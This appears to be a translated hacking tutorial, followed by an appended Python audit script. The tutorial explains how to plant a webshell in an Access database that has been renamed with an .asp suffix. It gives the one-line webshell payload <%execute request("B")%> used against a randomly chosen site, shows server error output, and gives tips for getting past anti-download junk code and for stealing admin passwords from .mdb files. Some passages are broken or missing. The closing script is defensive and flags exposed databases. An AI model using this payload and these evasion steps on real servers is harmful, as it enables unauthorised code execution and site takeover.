Perhaps because network security technology has developed and the quality of administrators is improving, administrators of Access+ASP systems now rename the MDB file to ASP or ASA to keep the database from being downloaded. Leaving aside that changing the suffix does not stop the file from being downloaded directly with tools such as net fast, doing this actually opens a door for intruders. An intruder can use a database with an ASP/ASA suffix to get a webshell directly.
1. Ideas
We all know that <% %> is the ASP script delimiter: in an ASP file, only the code between <% and %> is executed. In an Access+ASP web system, all the data is stored in the database file (the MDB file). Once the administrator has renamed the MDB file to an ASP file, the server hands it to the ASP engine like any other ASP page, so if the data we submitted contains <% %>, the code between the delimiters is executed when we request the ASP database. This means we only need to submit malicious code into the database, and the ASP-suffixed database becomes our webshell.
2. Example
Pick a target at random. First we force the database path to be disclosed ("Bauku") and check whether the database has an ASP suffix:
Return:

    Microsoft VBScript compiler error '800a03f6'
    missing 'end'
    /iishelp/common/500-100.asp, line? 4
    Microsoft JET Database Engine error '80004005'
    'D:log_mdb%29dlog_mdb%29.asp' is not a valid path. Determine if the path name is spelled correctly, and whether you are connected to the server where the file is stored.
    /test/conn.asp, line?

We submit: <%execute request ("B")%>
This writes the ASP code <%execute Request ("B")%> into the database, so the database: is now our webshell. Submit:

    /iishelp/common/500-100.asp, line? 4
    Microsoft VBScript run-time error '800a000d'
    type mismatch: 'execut
    /test/dlog/Log_mdb/%29dlog_mdb%29.asp, line? 26

Haha, our inserted code is running, as the following figure shows:
Note: when we submit code to the database, the code cannot be too large, so we use <%execute request ("B")%>.
3. Some other questions and ideas
1. Some administrators, besides changing the suffix to ASP, also add illegal ASP code such as <%='a'-1%> to the database to completely prevent it from being downloaded. Because the illegal ASP code is there, when our inserted webshell code is run, only the error from the earlier illegal code is shown and our shell code is not executed. Although this can prevent some attacks, a hidden danger remains: we only need to add error-tolerant code before the erroneous code, and our inserted webshell code is then executed and displayed correctly.
2. Where the suffix has not been changed, that is, the file is still an MDB file, we can download it directly to get the back-end password, log in to the back end, and then use the database backup function to change the suffix to ASP.
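To check a site for the exposure described in sections 1 and 3, the added example below (not part of the original article) walks a web root and flags Access databases saved under an ASP/ASA suffix, with a count of ASP open delimiters inside each. The function names and the sample tree are constructed for illustration, and matching the delimiter in both raw and UTF-16LE form is an assumption about how the text is stored.

```python
import os
import tempfile

SCRIPT_EXTS = {".asp", ".asa"}  # suffixes discussed on this page
JET_MAGIC = (b"Standard Jet DB", b"Standard ACE DB")  # found at file offset 4
ASP_OPEN = (b"<%", "<%".encode("utf-16-le"))  # raw and UTF-16LE forms (assumed)


def is_jet_database(path):
    """True if the file starts with an Access (Jet/ACE) header, whatever its name."""
    with open(path, "rb") as fh:
        return fh.read(19)[4:19] in JET_MAGIC


def audit_webroot(root):
    """Return sorted (relative_path, '<%' count) for Access databases under ASP suffixes."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext not in SCRIPT_EXTS or not is_jet_database(full):
                continue
            with open(full, "rb") as fh:
                data = fh.read()
            hits = sum(data.count(m) for m in ASP_OPEN)
            findings.append((os.path.relpath(full, root), hits))
    return sorted(findings)


def build_constructed_webroot():
    """Constructed sample tree: header-only stand-ins, not real databases."""
    root = tempfile.mkdtemp()
    jet = b"\x00\x01\x00\x00Standard Jet DB\x00" + b"\x00" * 64
    samples = {
        "conn.asp": b"<% ' ordinary page %>",        # real script, ignored
        "data.asp": jet + b"row<%placeholder%>row",  # renamed database holding a delimiter
        "clean.asa": jet,                            # renamed database, no delimiter yet
        "site.mdb": jet,                             # unchanged suffix, outside this check
    }
    for name, body in samples.items():
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    for rel, hits in audit_webroot(build_constructed_webroot()):
        print(f"{rel}: Access database under a script suffix, {hits} '<%' marker(s)")
```

Every path returned is a finding in itself, because the server will run that file through the ASP engine; the delimiter count is only a triage hint, since two-byte matches can occur by chance in binary data.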
It may be that I have made a fuss.